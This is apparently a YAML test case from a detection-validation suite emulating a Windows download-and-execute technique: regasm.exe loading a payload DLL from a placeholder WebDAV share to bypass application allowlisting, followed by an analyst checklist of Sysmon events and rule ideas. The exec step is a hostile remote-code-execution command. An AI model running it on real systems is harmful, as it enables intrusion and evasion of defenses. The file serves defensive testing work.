id: DLEXEC_013_regasm_webdav
name: "Download and Execute — Regasm .NET Assembly from WebDAV"
mitre: "T1218.009, T1105"
category: download_execute
description: >
  Uses regasm.exe (Assembly Registration Utility) to load and execute a .NET
  assembly DLL from a WebDAV UNC path. Regasm is a signed Microsoft .NET binary
  that runs code in the DLL's RegisterClass or UnregisterClass method, bypassing
  application allowlisting. Replace all PLACEHOLDER values.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-013] Regasm .NET assembly execution from WebDAV"

  - type: exec
    binary: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
    args: /u \\PLACEHOLDER_WEBDAV_HOST\PLACEHOLDER_FOLDER\payload.dll
    timeout_seconds: 30

  - type: sleep
    seconds: 30

analyst_checklist:
  - "Sysmon Event ID 1: regasm.exe with /u flag and UNC path captured?"
  - "Sysmon Event ID 3: Network connection from regasm.exe to WebDAV host?"
  - "Sysmon Event ID 7: .NET assembly DLL loaded via regasm.exe from network path?"
  - "EDR: Alert on regasm.exe loading assembly from UNC/network path?"
  - "EDR: regasm.exe spawning child processes captured?"
  - "SIEM: regasm.exe events present? Like odbcconf, this binary has very low legitimate usage."
  - "Rule opportunity: regasm.exe or regsvcs.exe executing with UNC path argument"
  - "Rule opportunity: regasm.exe making outbound network connection"
  - "Rule opportunity: any execution of regasm.exe outside of software install context"
  - "Gap check: .NET trusted binary abuse is commonly missed by signature-only products."
